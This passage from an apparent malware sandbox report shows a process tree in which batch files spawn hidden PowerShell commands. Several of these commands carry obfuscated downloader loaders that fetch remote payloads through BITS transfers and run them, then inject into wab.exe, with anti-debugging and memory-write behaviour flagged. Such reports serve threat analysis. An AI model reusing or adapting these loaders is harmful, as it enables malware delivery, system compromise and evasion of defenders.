ube3Apron1polyp9Blret2Hom,t7Risic9Bortf,Slutn2Parti4Linde7Mater0Ke,os8U,pmr)Bikse ');.($amnigenia) $roast;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jxjkrl.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$rsonnementssts;++$rsonnementssts;$rsonnementssts=$rsonnementssts-1;Function Rubrikken ($Swings){$Toxiinfectious=5;$Toxiinfectious++;For($Programtransformationerne=5; $Programtransformationerne -lt $Swings.Length-1; $Programtransformationerne+=$Toxiinfectious){$Biskuiter = 'substring';$Undermarshalmen=$Swings.$Biskuiter.Invoke($Programtransformationerne, 1);$Mottoernes=$Mottoernes+$Undermarshalmen}$Mottoernes;}$Unaghast=Rubrikken ' T.abh.ummitGods tSoldapP.nkes del:Fumou/klod./MallekHalvkiMetapsSh.enabaa.dn StivbStenceBaghotKonceh ageraKanelk ubse.UnprecBomlroKadrem Hear/Dory K B od/ KaskU Foran ,ksiiUnbusvB.osleIdrtsrByldesPictuaNdve.l PsyclCuffis g trn K ntiKastin Bev,g Desae BrusnOrchi.seashlLystbpKa,jekPrior ';$interessanteste=$Unaghast.split([char]62);$Unaghast=$interessanteste[0];$Fascistizing=Rubrikken 'Bo,lei ShriePon.ox Su,c ';$Emulgatoren = Rubrikken 'Vovis\Sensis kakpyVrngbsK mpaw GrupoHove.wP,als6Contr4 U ti\saxonW metaiHemmenParapdcroisoPottewAn,uvsNicarPphilooKassewEjendeZinnnrQvvinSInobthIrrese End,lSvinglRykke\Afho vvalky1St.ng.Selec0P.osp\Ur gupIndjooJockewBol geMichar SailsMaaneh PokaeUdmarlStepblProto.RealleSyvaaxAnapteBrahm ';.($Fascistizing) (Rubrikken 'Pakto$Th,moOPhysopF,adesAmmieaK,rsfeParottV.branSmalfiF.lignN,nangCytomeferskrDet,a=Hornf$Do baeen.osnOutbuverg.t: EkskwMonuri Sulfn ,aasdModtoiTaktirHonno ') ;.($Fascistizing) (Rubrikken 'Unapp$vandrEM.ntamKamnau Aff,lFenacgEfteraBesottSpel.oRegntr P.raeInkonn refl=Afski$TacklOF.llap ynelsKla.eaA,iniePlasttMu,tanRrigeiAdvann ,ejegForlseSmertrSolsk+Peber$TelefEStridmSynthuT.leolFstebgDis,ya UligtOma.boNambarPopule un en,ooth ') ;.($Fascistizing) (Rubrikken 'Pr,ce$BemynLRke viSpirigOplagfpirataKnsdil alvdSigni Biri=Perso Cana(Myopl(Dro,ig.eggaw Fainm Dufti.aras Inconw hjf iMe,uknHarat3Skatt2Julea_UdplapKntrerNuc eoPrepocDr.vaerenovs Bults Ma,n elemo-Hom.vFFormi Pore,PEfterrExcano PortcChateeSlaves Shoes SolsIForandOutcl=Cheek$ Agap{Und rPArmvrILi,aeD Per }nagor)He,re.RevolC AddloMenn mGamonmDrista omsfnLinj,d loakLHyrdeiEnneanPlaideOverk)Enhed Sp rs-D,gmas BuldpSallolLackei I,mitRebo, Fore[FremfcAlderhTelena T,nnrDirek]Novel3 Kin,4Taxe ');.($Fascistizing) (Rubrikken 'Som.e$DavidSBullitpre,ha Fo syUdfrseHindbrB.syneSuper1Genve2Hvine8Ampho Vuln=N,nme Occup$CitraLEkskoiHemolgAndedfAviewaApocrlKalkudappre[Tiltu$K rakLKurosi Pon gper.sf FarcaDemislAdm,ndS lvr.F rstcInde,oBereguForlenThwortInd v- No b2Sensi]Helia ');.($Fascistizing) (Rubrikken 'Dokum$P,ogrPRykkeoSegremFo udaFllesrSpejliIndpruFustimAlf.s=.enne(CykelTmodareIncursRefamtEntro-StamgPKodenaSoloetstaveh Fanc Anra$VremaEzipstmPed.nuPersolStet,gTerebaLy,put N.rwoApok rSlgtseSeasonHelic)Amizi Spol,-IndgrASbettnNectadInter Anden(Ca,dl[SyncrILaystn agurt,ydroPhairdtGrapsr Sejl] Istn:Udsyr:UnlimshomefiNonoczLetfleNetvr Hepa-Horn,eae,loqOrles Vinke8Abtha)enzyg ') ;if ($Pomarium) {.$Emulgatoren $Stayere128;} else {;$Rotes=Rubrikken 'b rriST,ofetUngilaM.derr UdsktSbefa-Ado,iBKrabniStro tAf udsBythoTragour poeta .napnRempls AfbrfSmedeeFejnir ud s Rati -GranuSBarotoTomanuVarslrG ddacli,heeangaa Subco$r preUdagnanZoocuaB ancgAfskahTempeaCanthsN.ejatMe.od Ingen-OarsmDYachtePort sOptedtSam,ei PlainWellsaUargut BansiVizaroAntitna kom Chirn$R,tteOIncrypMhedes Reala P areBiblitAphronBela iUd.annAppetguklareGlde.rs,lvf ';.($Fascistizing) (Rubrikken ' Uend$reawoOGalvapCo,cusPreviaRin,seTaxaet Co,pnCaylei Afp.nOverdg BouieBrrenrVi en=borde$ RelueRakinnPhytovS vbr:BrnebaSynsvpE ilspPremudPri,laDeltitGastraEr co ') ;.($Fascistizing) (Rubrikken 'DegraISimonmCockepShippoStarsr VedhtMik,s- I,faMWitn o Pho.dMalatuBemgtlLucese Rici EmpanBDelibiSinastPlusks UnelTNonprrCantaaActinnbax es Co.tfPrompeNect rMicr, ') ;$Opsaetninger=$Opsaetninger+'\Biseksuelt67.Ker';while (-not $Misbehaviors) {.($Fascistizing) (Rubrikken 'Timod$ BranM.evoliEphe.s ncombForudeDiluvhSildeaRu.rav Pilii,ikhao FallrturbosCasso=Paali(wellhTU itee.ejeosFaksitLabor- racoPTransaG wket,egnihB,lly Tonet$LandbOZonelp icksPyxi,aMaurieChemitReto,nGeni i Hul,nA.racgly.skeA.sasrOplys).ookl ') ;.($Fascistizing) $Rotes;.($Fascistizing) (Rubrikken 'KohovSBltest AgnoaTransrGrundt Unsc- NidiSUntaclPropieHalvde SlutpLodem ,rund5Misro ');$Unaghast=$interessanteste[$Gemmologisk++%$interessanteste.count];}.($Fascistizing) (Rubrikken 'Chiro$RabbiOSe,lrpFrav,lBrancs forunFejlriPaulonPodopgI.exhs RevisInkastA.todeUdskrmSangemMozose CosmrForden.enneeSkreksPolyr3Norme2.emis Omdel=Glago re,roGTh,rmemoldytVe ti-GyredCDyvleoRa ikn Ste tKerameFas.inFosiet Isol Henr $NailsOOpp.ipParalsSkyldaKumpaeUdbyttBeatan T,mii PetinPolysgMastieTo.akrPhall ');.($Fascistizing) (Rubrikken 'T tan$CitroFDailkoNavrsrDisavs Kelpa Pse,m Unp,l bl diNeokontibiog.ugans Fuths TentaInfralSupereZinnis,oled Inte.=Hjemm Faseu[PasanSFedtly.lektsReguit,efinefrugtmCerem. ResrC slutoUnexan Phy.vInduseFdegorTri,mtPat e]Elast:Coun.:LitteF vildr ieveo F rsmtobogBSe,araRefles Hor ewatt.6Spytt4HowleS Bo,bt.ankor Tilki P eanAf,kngSkarn(.agsi$ForfrOGodtgp Ces.lSeismsForlgnBast.i P.evnCost,gBrugss Ba dstimbrtM,xiteBevgemI,rtsmEllsaeBlndlrt.nalnAntiaeContrs fort3Disco2Unsy )Listl ');.($Fascistizing) (Rubrikken ' Vest$SrbehMUn atoH,laununderoRecippPoplih si gt,allehente,o,mbosnPralsgWastri ClouzBrigaeDisked,tten No ty= Unpr Typot[ amelSKom,lyForetsBypl tDysaeeKgr.mmbtfin.Na olTFyrskeSpecixFri,utInduc.AffekEBrooknStyrkcAcet oByfesdAger iEditenCloppgsmier]Telo,:,itro:ZonopAHvid STilsyC LoyaIDenatIImbri.FlannGFarteeU multUdsveSCh,litUroror Di si Man.nNu,ifgNegqt( Grup$ aabnFMinuso.luttrGainlsCampaaU cerm fsel Bronidip,yn termgNon,rsBirdbs abyla SparlUnhomeUnhalsUnder)Compe ');.($Fascistizing) (Rubrikken 'Forvi$ TeleWForcioad ploMictud AutoeHoteln.umblePengerDmtal=Efter$Kar,lMUnderoM,celnClubso Verip F.sshSemittBer ghStemmoTankenangusgslettiBoredzV,rmeeSwi,md Bili.IntersKeoutuPluddbAfviksAnordt SluirSjlfuiAffixnepiphgCiffe(Sav.l3Udfly0Disko2quadr7Typha4Krukk5 kast,manur2Abede5,oebl3Bojit1Betas1Lign,)Obser ');.($Fascistizing) $Woodener;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pryhtl.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Dirigomotor;++$Dirigomotor;$Dirigomotor=$Dirigomotor-1;Function forladtheds ($Myrothamnaceae227){$Dork=5;$Dork++;For($travertinen=5; $travertinen -lt $Myrothamnaceae227.Length-1; $travertinen+=$Dork){$Coatimundi = 'substring';$Circumviate=$Myrothamnaceae227.$Coatimundi.Invoke($travertinen, 1);$Rdstensmures=$Rdstensmures+$Circumviate}$Rdstensmures;}$Linjefags=forladtheds 'Kl.jnhO hertOptoptFicuspNe.spsBered: pidd/ Fi,e/,ecidkHete.iBenvvs ,jeraBedranAlumnbS nareFor.st megahCel.baCohomk Supe. Tingc H,emoLo ogm Proc/Biso.PAfsyr/ TrepSSupe.lFileriAffjedOutraeTer uaOfficb ove,l rchdyDiaba1 Seam4,ekun7udst,.prem.sYummimOrthoi P eb ';$Paasmringer220=$Linjefags.split([char]62);$Linjefags=$Paasmringer220[0];$Skridnings=forladtheds 'ReinciAfluse.itchxeiden ';$Decelererende = forladtheds 'Backi\VetoesB,ugeyIndags yperwBehndoReg.owLogic6Spise4Argal\ .iltWCarpeif uffnMes idTil,oo.estewFolk,s Re,uP Ep,soraisiw Thine ,orurMr stSHo,rihUncomeEightlBuelalTrawl\RabunvRered1Overp.Toftl0 S ra\Nede.pSlumroewhoww Elo.eTr,firKom asPa,athScyt.em.rial SliblN uri.va.dmeStd,rx SwaleSkyld ';.($Skridnings) (forladtheds 'Al.ue$PhotoSDem.ok Phleo ygedv KikasFryselUdv,eoU dbrt.cantt PhleeLy,sksFogle= Sag,$u.moreGymnon Di.gv.onpr:P pirwActiniLejemnOrdredstagsiUng.rr Flu. ') ;.($Skridnings) (forladtheds 'Tezwe$ Ha dDAc,eaeUnsu.cD.sgeed,agelVintee Carnr urste ,kderDebate EccrnHollndRazoreIn bl=git,r$FinanSUdviskL gego Galtv PunksVelbelDobbeoBouletForvrtSikkeeRunassJussi+ Supe$StagiDC riae Laa cSjlereForgrlConcreErhver achieUnabur Ashoe Fo anEslabdGenneeMicro ') ;.($Skridnings) (forladtheds ',azar$ForsvPSandaaT tarp ntraypodoprGau tofuzedl Ko,eoPseudgPlaisi K.emcCsaria Soo lJewes ,erv=Ca ma endbo(s,riv( S elg tiftwArbejm,ndeciCo.fo Papirw,begri Br fnPigwa3ene.i2Skat,_ IllepUbi.trDiapeoMi,tecKerneeDuerisSt.ycsBerri Keros- p.llF Byud DowntPCaulkrDo.teoir.evcLste.eSkywasAmusisBaronIOrgandAntag= Biga$Lymph{ForagPHabilIDesinD U ma} orhu)Resym.MastiCModtaoSwaggmU grfmVernaaInvesn BliddLipoiLFo.ssiKortfnCitate Rod.) .etn majon- IntesSgnedpBotanl .onni S.ertDisma Tankr[ KlovcEuc lhCr,wla Il.urRiata] Modt3 Toge4Brner ');.($Skridnings) (forladtheds 'M bol$ AizoFBrosel HernyLak et KauttTreeteAest.bBardeuLophisSnksmsAgaveeSte,orDanics R si Def l=Immeu Epih$ PrebPHofhoaOrangp Spaay vhsmrArkivoAandelSvrd,o ReargUltrailacercBlg.laTil plB.rdk[ Attr$ nterP oedsaSlamspEelpoySikkerFo,tloLnreglHaando Propgbaci.i Stadc.esteaDisoblPenta.LinolcUnculoScammuKlagen TraftS,ffi-,oorb2Lves.] Surr ');.($Skridnings) (forladtheds 'Contr$SiphoM ecomaHoboecRejserVred,oKrstebAntonifidaco AsmetLe eve Per.=Amidi( BrodT Sup.eBeskrs LagetSigjn- UngrPre.tia sp,jt K rshFa en Traga$AlumiDInsureReturcsaliseOpslilHerreeFordlrExhibehabilr itnaeDisprn NedsdUpaakePange) Baa Ch,ot-panteASmakknInterdLacer Retol(Brors[taxafIKr,dinGenertNettoPHyattt Op,orGrint] myth:Lipol:k,asssHavegiNongezMisbeeSuffr Sebk-TonekeHjme qBussi P,lyt8Senso)Peris ') ;if ($Macrobiote) {.$Decelererende $Flyttebussers;} else {;$Anskueligere=forladtheds 'OrdklS DuentBuf oaKort rAciditUnall-ForesB.elafiU,levtPaleos InopT.ormarPerseaYndlinDagbosAlfalf Bigae E,isrIsenm Aarga-HarmiS DebuoSousaua.gulrhuslic KongeCorag Vivis$HaarsLNettoiRegulnLicenjBibliePlissfKorroaBardygUn ens,ands Bl ff-FryseDNighleBe.yvsB ndotRouleiEnrernEkstaaPresptCera.iLogo,o Faminresto nucle$fermeS D.uekFornaoDiskuvGtheds MowslAversoRealitGenant AandeUdgansAquaf ';.($Skridnings) (forladtheds 'Che.s$MindrS Tid.k CryioDysphvUnvapsAntislCarpooFarsit El.ct ConceAldersVapou=incre$FormeeTullenSkamsvSoe.e:Ab.tiaResorpRveripSidendNonoba Re,ntLaterasekst ') ;.($Skridnings) (forladtheds 'KaalhIAbnormUd ivppipesoKalenrTambut .eal-O.ersMFecg.o U pndMangfuViru,lH ppee fors pearlB KliniUnloatBalansProraTTurq.r.entraKontonbre,ps PolyfO.ruseKapitr Citi ') ;$Skovslottes=$Skovslottes+'\Tabulatorkodernes.Aid';while (-not $Ameliorators) {.($Skridnings) (forladtheds 'Inspr$S,eniAFeltbmIntereGabesl,omeriSe,eloNedskrKvinda RepotGlas oFana rPeponsForga= Pres(Ba.neTP goseTumulsForantCopal- s.arPDe rtaAarhut RevehFreel Sprog$ ,mbaS Sig.kBabe,oE.iopvoutthsRevellOperaoHjerntOprett Allwe Be,rsvenst)Epit ') ;.($Skridnings) $Anskueligere;.($Skridnings) (forladtheds 'JulenS g actUnaccaDire.r Da.etPoolr-te.epSValgels xtae .enreAf.rfpUnwes Overs5Downf ');$Linjefags=$Paasmringer220[$Underekstremitetens++%$Paasmringer220.count];}.($Skridnings) (forladtheds 'Atoll$prereiSt otb S eci GestnUndu.aLaicisQuins E,art=Chris Vol,G HemoeMyatotOutsl-PinniCbe.kfo Animnmarant LataepalagnCallot Gabe Band$ EnkrS KontkDed,ao Gru v WheesG,stul,mklao AfhntForehtSoff eRhebos neur ');.($Skridnings) (forladtheds ' .nfo$tresaCTu gmiBesttrFrig.cG,neauEntallSquigitou hnWife 1Anven6Anody0 Men G.ogn= Udr, antic[AntimSHimatyArchps Pan.tOv,rleSikkemS.mul.AikucCBe,cooMaizenNouvev Kampe.nvolr IdiotGrung]Under:Yffri:Haa.dF JodorSkuldoS rmfmEndotBHyposaSprogsDuitse Ti.s6Undi.4Me chSPartntSu jur requiU,planAggragMods ( Brom$U komi lngebPseudi alennBjlkeaGeomesLameb)Zoner ');.($Skridnings) (forladtheds 'Overs$Regn OMussarSemimdRemearCrapueOppusb Ggese,entrhatresoYaourlTetrod PounnSgtemi,indin Afskg.hmer Nagle=Gynec Monan[BarbeSNondryadgans Haemt onoeTyvekm Patr. BetoT SukkeForbrxFatidtClamm.bou uEGermanInv lcBlomso xperdSmalsibasarnSalgsgEn,ro]rumpe:Thuli:Zoox.AOverpSToxicCDeinkI CupiI Fred.BredtG Letge.ushitByggeSP,tartStephr udv.iRen,jn.nkemgInd i( gata$R.ndmCogygii.nebir SnrlcKobbeuIn,erlHirs,iLo ftn Dryp1Carbu6,anes0 Begy)Bolig ');.($Skridnings) (forladtheds 'Kl es$EndueKKashmaSegmekGenneeFritum BejloCorronunfieo Tabus D,nl=Ompha$Sid,sOTenorr FlledUnfi.rAromaePotshbShakiePot mhpashaoSc onl SaccdIdeatn ha ti PhagnEnyasgCadet.ErritsHer.iuRokkebByggesrea,itpebakrOverliGarnvnTypotgGurni(P,rid3 B.an1ar.ej3Kdere3Minim5Uncur9 heep,C non2unpre6Uvanl8Kro.s7indlu0Briss)O.def ');.($Skridnings) $Kakemonos;}"
6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4112

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cdfvtk.cmd" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Gutted;++$Gutted;$Gutted=$Gutted-1;Function Ayegreen ($Organiserende76){$Heterochrony=5;$Heterochrony++;For($Unexceptionableness122=5; $Unexceptionableness122 -lt $Organiserende76.Length-1; $Unexceptionableness122+=$Heterochrony){$Repetitiousness = 'substring';$Disgaveled=$Organiserende76.$Repetitiousness.Invoke($Unexceptionableness122, 1);$Paratomium=$Paratomium+$Disgaveled}$Paratomium;}$Jakkelomme9=Ayegreen 'LessehUd.iktasyndtKurvepRo.ansOpso,:M.lit/ Pern/U,corkPeo,li Cenes DidyaBrddenSk mpb AnseeMonogtIn hehsalgsaSpredk Ka.o.Kotelc Hento,ripemProte/ Ost.KBoced/Fr.psA HumerZi.pic .evetTmreriUndric BibliElamizungode Unde1Sport1Ranci9B.swe.DecidxKu,tot tstopDetal ';$Vidnegodtgrelse=$Jakkelomme9.split([char]62);$Jakkelomme9=$Vidnegodtgrelse[0];$Kandidatfests34=Ayegreen 'Unormi ForbeContaxCin.a ';$spurveungen = Ayegreen ' croq\AfgansSupery FenasBanepwModgaoTepirw,ring6Wh.ck4secul\SnuffW EpheiS.egenbortrdInforo BegrwSebolsExhauPBlegnoYahwewGentieMeatwrRockoSEmitthTilspeListelTe,eplJumbo\HeptavV.nte1.onot.genne0 gel\ ForepUninsoAffinw Sk ie TeksrPi.wisCentrhSmer eKlaptl MendlAssi .Gedebe Skydx ,odee Faki ';.($Kandidatfests34) (Ayegreen 'grain$kundeRsmr.ooTilkaeTilsinstagsdHellie Sukk= Noni$Pe,rleAcclinChabavDurat:GomlawBoligiLeuconDisabd Gan iGenerrskrms ') ;.($Kandidatfests34) (Ayegreen 'Softw$Ind.ns,ecoup M,pguKimblr rummvbak.eeSlaviuFatten By egRerine NeurnE,yth= Impr$DefibR SkiloGaspre.ountnReg,ndWep rePaga,+Scler$E hvesForstp TrinuDerf,rRedfivomganeOverguPo opnpridig.repaeReklan Subo ') ;.($Kandidatfests34) (Ayegreen ' Pa r$mer eM Pla a T,iml RapsaMultirun cci C.nnaN.isepOmarbrbusseoKvindoBeregfSemin1Jabbl8 F.ue subse= ooft Cronu( Set ( Forug ConswAskovmslugviZardm InkliwArbeji Dr.pnUnabi3Lsepr2Suffi_ Ge,npAwardrKummeoTuefoc.eauteFamilsDggels Unhy Infor-EarleFAfmaa DybdePDanskrsagasoPig.bcTilkoeRaglesRenovsNon.xIStd.udTerro=Misun$ Fall{FeathP TilsIDasseDFolia} U.de)Dddru.SvippCpilaso igsamdobbemHefteaJonglnIb.ugdMea,oLSkrueiHovednTrekbeFiefd)Skibs S,egn-SlentsUdda,pMrkbll FairiPa ift Lith ophv[ ForfcBebudhWisela.roker redi]Forbe3Trans4Overf ');.($Kandidatfests34) (Ayegreen 'Biolo$RhizoSSkattuAlquinParetdUndera Flakn Du te RedisC,itteGig a rops= Mali Temp,$ ImpeM.eseraSmirklattacaEnogtrHassei tilbaElskopHjemfrtve,aoFavreoD,taafFabah1Cicat8Perti[Coest$ Red,M lokaaKreeplTnde aPolitrClassi AastaMastepPatterUnorgo Lo.toP.ecif Lou 1 Pulp8 Ufr .AnkepcRituao Dem,uChiegnEud.dtpyth.-Infar2,eume]Crios ');.($Kandidatfests34) (Ayegreen 'Snows$FornuSReifikDissei,eennfAdmontTa.tenAmpliiRnulfnSiameg D ypeSuperr IncosFicus=Kv,pr( FibeT ulfoeDegensMilitt Rea,-TattoPSpontaStodgtDe inhBiogr cean$ ,ynnsVrdi.pDiapauRe,ndrSkattv nonee ErhvuPrecon avilgConfuestiksn F,re)H,pni Bu.le-Vol pAConvenI defdTndem Kontu(Dagp.[PedicIDiskenSgelitE.kliPK nontBesejrTands]Saddu:Uvorn:unressWedgiiCoalmzP ismeVinbj Runds-Gennee Sk lq ,lep Undvi8Knowl)Trop ') ;if ($Skiftningers) {.$spurveungen $Sundanese;} else {;$Pagodens=Ayegreen 'Pal.oS MarmtA,krvaCinderIlle,tstrbe-DisocB Sikli Belut,aandsLoo,fT workr ,toraSelvsnFact.s CyrefGaasee.lagtr Terv ryc- u,psS vestoKatolu ClubrRatiocVestue U ph Ho.e$UntwiJNoncraMinimkNonalkIndereKaurylBlaiso DorsmBrainmR.mineVider9Besud Skald-UranoD,irioePla isPreextRe.eki ynopnForklaFugtstK,lloiTvekno Vin,n okke Ter,s$ Shi RVaaseoResseeBasidnIlanddBorere Fria ';.($Kandidatfests34) (Ayegreen ' Udru$ abbeR.artioYear,e Bulbnhundid BgereErhve=Bl,ck$Sv,keeAab.inP.ldev Pra,:KaramaRispepIn,grp AssudK.kseaAage tProthaBalle ') ;.($Kandidatfests34) (Ayegreen 'PandeI ,animNsectpC.lvaoK spurLysertChado-SubprMManufoPee,edVgteru AkutlStempeSu.er FdselBBohaviRom ntMelles Afl T ProerChacoaSvm,en reasKontrf,emireTallirNonre ') ;$Roende=$Roende+'\Ws.Tro';while (-not $Konomicheferne) {.($Kandidatfests34) (Ayegreen 'T.nna$Expe K Am.soPostenInspeoReinvm.usbaiB nescTiddlh LeaveSpongfSecr,eDistrrIntranSlageeTomas=neste(UnhusTKulmueS ccesPupattBesti-EpiloPGobelaJonahtViv.fh Ex m regnf$GroutRTalefoUndepeSatirn LazadHjem eKomm,)kale. ') ;.($Kandidatfests34) $Pagodens;.($Kandidatfests34) (Ayegreen 'Begi SPreext AnglaVe.barLaelatCanna-N.mphS Oliel CampenonvieSharppSkarp Exter5Langs ');$Jakkelomme9=$Vidnegodtgrelse[$Skamferede++%$Vidnegodtgrelse.count];}.($Kandidatfests34) (Ayegreen '.laxb$LagomlK,tasi Refot Pathh.nymooNonp,pHygroh Benzy raadt sciuoRygeruSo.mesomfor Defun= Vild TankvGFo,breMastutFirea-Dr,ptC Ph.no Aut n AarstThro e apitnDuodetfu,pe Jgers$ HjrnRChaetoDecoceScrapnSublid Coene,orgr ');.($Kandidatfests34) (Ayegreen ' Espr$ ResoU ForpdSejtrfEstimo As orNordsiPrfabnSneg gsongwe.leninMedfasE.egi8 El,k9 M.no Ign.t=Farve Disku[W.gglSStor,y H rbs.adsit.lecieDisemmnone,.SprinC igteoGen.rnKaffevToldkeFors.r aanet Bevi]Tilel:struk:Yuqu.Fu enrr Ambiorejfem.andsBRestoa Kants estreAltsa6Bulbi4For.mSManustLadler,ktivi ,ignnaabengP,ede( Mu d$RenovlRokkei wa.etfemmeh,alisoAlvorp SpekhHj.mbyVir,ctre.leoBortfu Choks Mili)Udled ');.($Kandidatfests34) (Ayegreen 'Sagom$ LaodLSaccheRu.olsNedtos Od foSmuglnTv,ngsO gan Sjatt=Sprin Inter[TitraS Ostey,verisO,erltComp,eSkrmimNomad. Agi.Tprim.eHame.xIde tt arb..U alaEBrnehnVurdecBastooUpfl.d Extei antanN,nacg kage]Wharf: Over:st,beASvbesSSanikCRoy.tILyrerIFugtd.StimeGFdselePerictAfholS.isret StifrStotgi,eddynPo,tigPo.ta(Lun.b$ManifU ForsdBantufRelakoMglerrChloriUnc,nnSondegCoalse ussenIntersStedm8Stee 9Flags) I,at ');.($Kandidatfests34) (Ayegreen ' etr$HerreDIndena aarhh MammlEpideeSvalerSynsruExplapFinla= Unde$ThesmLSyllae Skols FrissTindeoStan noplg.sNavig.N.dsks remeuVildbb ndkrsAlbaetolerar,andtiOpjusnFortvgOlier( Leve3Telli0P nkt7Slgts2Havan2Re le2Forre,Ove v2emi,i5una,s3Su.er6Betal7Tiend)Micro ');.($Kandidatfests34) $Dahlerup;}"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 2544
7⤵
- Program crash
PID:2136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmvrzg.bat" "
5⤵
PID:2304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "++$Equipping;++$Equipping;$Equipping=$Equipping-1;Function Geranial ($Usherance){$Kommandodelene=5;$Kommandodelene++;For($Allentando=5; $Allentando -lt $Usherance.Length-1; $Allentando+=$Kommandodelene){$Disassembles = 'substring';$Overfladebehandlende=$Usherance.$Disassembles.Invoke($Allentando, 1);$Fulde=$Fulde+$Overfladebehandlende}$Fulde;}$Arbejdsdatabaser=Geranial ',erlihTaraptSuppotguzzlpNu.elsKa es: .ond/,enpa/Sste,kCtenoiForp,s.remaaDeltinTransbepit eFrysetSkidehProduaU.clokIrra,.ElastcRaadso Dom,mAfsk,/LivsfKB okl/Plur.f OpspnF egnb Blinl Trang In tn .runiMiljbnI morg.eglleSkavanSprjt. AudapBegrocTekstxGra t ';$Grundejerne=$Arbejdsdatabaser.split([char]62);$Arbejdsdatabaser=$Grundejerne[0];$Genforeningsfest=Geranial 'L,epriSp nde RiddxP.lic ';$Transfereringernes = Geranial ' einj\PenibsDeduky bespsAar,rwEj ndo dipewBuiro6Infor4A boy\ UdkrWFaldgi FungnSkattdno esoBan,fwPaleosRe,liP Feu.o,reopw Ko me QuadrAle,bSPre shMon,re.oluml Re,bl,ende\An.huv Best1Melog.Prjse0Naph.\Ekstep Saneo Be,awbrotheRealsrAmtslsBiroshCharoe OptrlSemitlMo.gn..omnaeUnderx CorpeTryll ';.($Genforeningsfest) (Geranial 'Lingu$InsolFJacoboPolinrGravatImmuniUn mpeEjendsIncen=Tilsk$NybbleAppron N nfvPersi: S,umwUrosii Und nDagbodBrighiHovedrUdrig ') ;.($Genforeningsfest) (Geranial 'Pseud$ SlvmT Lu.srin.alaHistonBremssSal,mfSl.tteHyperrVog ee S,rarAdulaiAfglanC.vergN.nreeRaadnr .aronUnunieD.gbdsLazza= Fert$KommuFpaccaoElemer .ngltSkalmiBnd.leEpicosCu at+Phosp$eumenT HobbrSuperaBandonun,oosHeliofHalloeDatamrOverseBladnrUnr.liFlakknStat.gBulneeGa,lor ForhnRets.e Pha sAdspr ') ;.($Genforeningsfest) (Geranial 'Synon$K rriuMo ybnIamb.pUdrivrSomnao se,ibild,taAgenttAnbefi Sle oSyngenExcusaWarunl .asc Medit=Tisty Kontr( Styl( EchogUngu,wPosedmBe deiJ,ggl Cale,wGla.ziKo menSifse3App,a2Ad,ok_Hagiop S,rarSamfuoGiftecFresce ParasPrevasSpi,d Pusl- IndvF Tewe DamalPFufflrBanyao ouccBr ndeNaestsPal,asDetacI H gedb ser=Bagdr$Slagg{LemogPUnexpIOut.iDRubet} Juni)Forva.WhimsCLibanoSignimOr.ctmMis iaAnlgenHand dScrubLKegleiPuckrnFagvieHauge)Herpe Broma-BiblisCentrpGrosslOptomiK kketCoext Edite[Pu ilcGe,rdhTae iaSpnderHa,al] P ol3G.und4Solso ');.($Genforeningsfest) (Geranial 'pjask$DevouiPropanDisapdJydesrS,redeSdvantAirshnScragiSpa enInhalggambi Daugh=Up.oa Opd,$.piphuCiv.ln DecrpOverrr Nordo Dy,wbInforaPerhytParisiForaaoLudfanalbumaRdse.lamant[Pl.ve$Strafu AmernXanthpGej trRegnsoScolybBlom.aFor ytUnshai Mor.oSammen Powna Broml,acch.vanddc Mu.fome.fou K.rvnLiv.ltSyge.- Reng2Fo,ty]Velan ');.($Genforeningsfest) (Geranial 'godke$b,rbaP rachrEurypi J sto RhetnbarraoTarifdBruneeUnd,tsU kylmPhaenaVictoc CrimeMigrao ri su.oplosdukse=Pa an(DisdeTFodreeDelafs .ndrtMonog-UnivePPhytiaLs intSp.tth Sten Wame$R bedT Alb,rZy,nea OvernComplsv.rknfSmkkee Tingr .onpeSpidsrSi pliBankonCeraugAlvuse G ldrTritinHjtrye SerrsFluor)Under Peppe-FigurABesttn rigidUklde u sy(Opmar[Flue.IPnhednFo git HrfrPOverptBowlirOutfi]Flabb:Datat:A,tonsFilifiAnsvazUdvlge Poyo Anise- IndsePancrqProli Fe.no8Mi,ns) Pr.b ') ;if ($Prionodesmaceous) {.$Transfereringernes $indretning;} else {;$forktret=Geranial ' Po yS St,rtRaffiaL.botr Paakt Stam-tall.BHeteriUnititappelsGrubeTSp akrInde,aPacifnMask.s DjvefUnwoeeVersirT.gnk So ub-GalloSQuat oS irruMatrorKldnic Li teCo.in Buff$ .ossA spurrTrib bCystaeOver,jDemoudTaxi s ommud F lmaTibettTermiaFamlebPost aFor.rs .ppreF.otgrCop.s Bepim-TritoD Kon eKnebrs Formt Unifi.arhon GasiaActiftBirthi Sub,oCamelnBvred Fiddl$orchiFu.heaodi,plrNonflt.qualiTe,ree P,acsAceti ';.($Genforeningsfest) (Geranial 'Bl.kk$Sal 